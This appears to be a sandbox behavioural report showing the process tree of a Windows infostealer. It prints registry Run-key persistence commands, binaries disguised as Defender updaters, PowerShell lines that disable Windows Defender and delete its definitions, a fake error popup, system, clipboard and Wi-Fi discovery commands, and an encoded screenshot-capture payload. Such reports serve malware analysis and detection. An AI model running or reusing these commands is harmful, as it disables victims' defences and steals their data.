C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f42⤵
- Adds Run key to start application
PID:5620
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f42⤵
- Adds Run key to start application
PID:1164
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"42⤵PID:5704
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"43⤵PID:5648
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"42⤵PID:4616
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"42⤵
- Checks computer location settings
PID:5480 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\64D0.tmp\64D1.tmp\64D2.bat C:\Windows\system32\java.exe"43⤵
- Drops file in System32 directory
PID:5476 -
C:\Windows\system32\timeout.exetimeout 144⤵
- Delays execution with timeout.exe
PID:1136
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f44⤵PID:6032
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f44⤵PID:3048
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f44⤵PID:2420
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f44⤵PID:5284
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"44⤵PID:1656
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"45⤵PID:380
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"44⤵PID:1528
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"44⤵
- Checks computer location settings
PID:5996 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6CFD.tmp\6CFE.tmp\6CFF.bat C:\Windows\system32\java.exe"45⤵
- Drops file in System32 directory
PID:3744 -
C:\Windows\system32\timeout.exetimeout 146⤵
- Delays execution with timeout.exe
PID:4184
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f46⤵PID:5600
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f46⤵PID:1676
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f46⤵PID:4724
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f46⤵
- Adds Run key to start application
PID:5784
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"46⤵PID:6096
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"47⤵PID:3184
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"46⤵PID:4860
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"46⤵
- Checks computer location settings
PID:732 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7450.tmp\7451.tmp\7452.bat C:\Windows\system32\java.exe"47⤵
- Drops file in System32 directory
PID:5800 -
C:\Windows\system32\timeout.exetimeout 148⤵PID:2828
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f48⤵PID:5260
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f48⤵PID:3096
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f48⤵
- Adds Run key to start application
PID:3244
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f48⤵PID:5424
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"48⤵PID:4492
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"49⤵PID:3204
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"48⤵PID:3408
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"48⤵
- Checks computer location settings
PID:1620 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7C01.tmp\7C02.tmp\7C13.bat C:\Windows\system32\java.exe"49⤵
- Drops file in System32 directory
PID:5176 -
C:\Windows\system32\timeout.exetimeout 150⤵
- Delays execution with timeout.exe
PID:5268
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f50⤵PID:5320
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f50⤵
- Adds Run key to start application
PID:6100
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f50⤵PID:5024
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f50⤵PID:5752
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"50⤵PID:368
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"51⤵PID:5264
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"50⤵PID:1092
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"50⤵
- Checks computer location settings
PID:5404 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\843E.tmp\843F.tmp\8440.bat C:\Windows\system32\java.exe"51⤵
- Drops file in System32 directory
PID:4124 -
C:\Windows\system32\timeout.exetimeout 152⤵PID:5292
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f52⤵PID:4260
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f52⤵
- Adds Run key to start application
PID:5684
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f52⤵
- Adds Run key to start application
PID:1312
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f52⤵PID:5724
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"52⤵PID:3108
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"53⤵PID:3000
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"52⤵PID:5792
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"52⤵
- Checks computer location settings
PID:5868 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8BFF.tmp\8C00.tmp\8C01.bat C:\Windows\system32\java.exe"53⤵
- Drops file in System32 directory
PID:5188 -
C:\Windows\system32\timeout.exetimeout 154⤵PID:2324
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f54⤵PID:5228
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f54⤵PID:5912
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f54⤵
- Adds Run key to start application
PID:2360
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f54⤵PID:6104
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"54⤵PID:5528
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"55⤵PID:5920
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"54⤵PID:2760
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"54⤵
- Checks computer location settings
PID:5720 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\947B.tmp\947C.tmp\947D.bat C:\Windows\system32\java.exe"55⤵
- Drops file in System32 directory
PID:5284 -
C:\Windows\system32\timeout.exetimeout 156⤵
- Delays execution with timeout.exe
PID:1128
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f56⤵PID:5128
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f56⤵PID:3028
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f56⤵PID:6136
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f56⤵PID:3352
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"56⤵PID:2740
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"57⤵PID:5696
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"56⤵PID:5908
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"56⤵
- Checks computer location settings
PID:2792 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9C5A.tmp\9C5B.tmp\9C5C.bat C:\Windows\system32\java.exe"57⤵
- Drops file in System32 directory
PID:3416 -
C:\Windows\system32\timeout.exetimeout 158⤵PID:1312
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f58⤵
- Adds Run key to start application
PID:5724
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f58⤵
- Adds Run key to start application
PID:5804
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f58⤵PID:5492
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f58⤵PID:4356
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"58⤵PID:4860
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"59⤵PID:3244
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"58⤵PID:4756
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"58⤵
- Checks computer location settings
PID:6064 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A39E.tmp\A39F.tmp\A3A0.bat C:\Windows\system32\java.exe"59⤵
- Drops file in System32 directory
PID:4564 -
C:\Windows\system32\timeout.exetimeout 160⤵PID:3592
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f60⤵PID:3564
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f60⤵PID:5972
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f60⤵PID:4952
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f60⤵PID:4708
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"60⤵PID:456
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"61⤵
- Drops file in Drivers directory
PID:4848 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe'"62⤵PID:6120
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe'63⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3536
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"62⤵PID:5080
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend63⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4288
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Could not open the file', 0, 'Error', 32+16);close()""62⤵PID:5648
-
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Could not open the file', 0, 'Error', 32+16);close()"63⤵PID:3508
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"62⤵PID:840
-
C:\Windows\system32\tasklist.exetasklist /FO LIST63⤵
- Enumerates processes with tasklist
PID:5388
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"62⤵PID:6084
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid63⤵PID:5312
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"62⤵PID:1644
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 263⤵PID:5492
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"62⤵PID:1192
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 263⤵PID:392
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"62⤵PID:5384
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name63⤵
- Detects videocard installed
PID:4368
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"62⤵PID:5220
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name63⤵
- Detects videocard installed
PID:5992
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"62⤵PID:3996
-
C:\Windows\system32\tasklist.exetasklist /FO LIST63⤵
- Enumerates processes with tasklist
PID:5324
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"62⤵PID:1448
-
C:\Windows\system32\tasklist.exetasklist /FO LIST63⤵
- Enumerates processes with tasklist
PID:5780
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"62⤵PID:4588
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName63⤵PID:2980
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"62⤵
- Clipboard Data
PID:5008 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard63⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
PID:2248
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"62⤵PID:1732
-
C:\Windows\system32\tasklist.exetasklist /FO LIST63⤵
- Enumerates processes with tasklist
PID:4300
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"62⤵PID:2252
-
C:\Windows\system32\tree.comtree /A /F63⤵PID:4364
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"62⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:2516 -
C:\Windows\system32\netsh.exenetsh wlan show profile63⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4372
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"62⤵PID:5044
-
C:\Windows\system32\systeminfo.exesysteminfo63⤵
- Gathers system information
PID:3188
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"62⤵PID:5968
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath63⤵PID:5788
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="62⤵PID:368
-
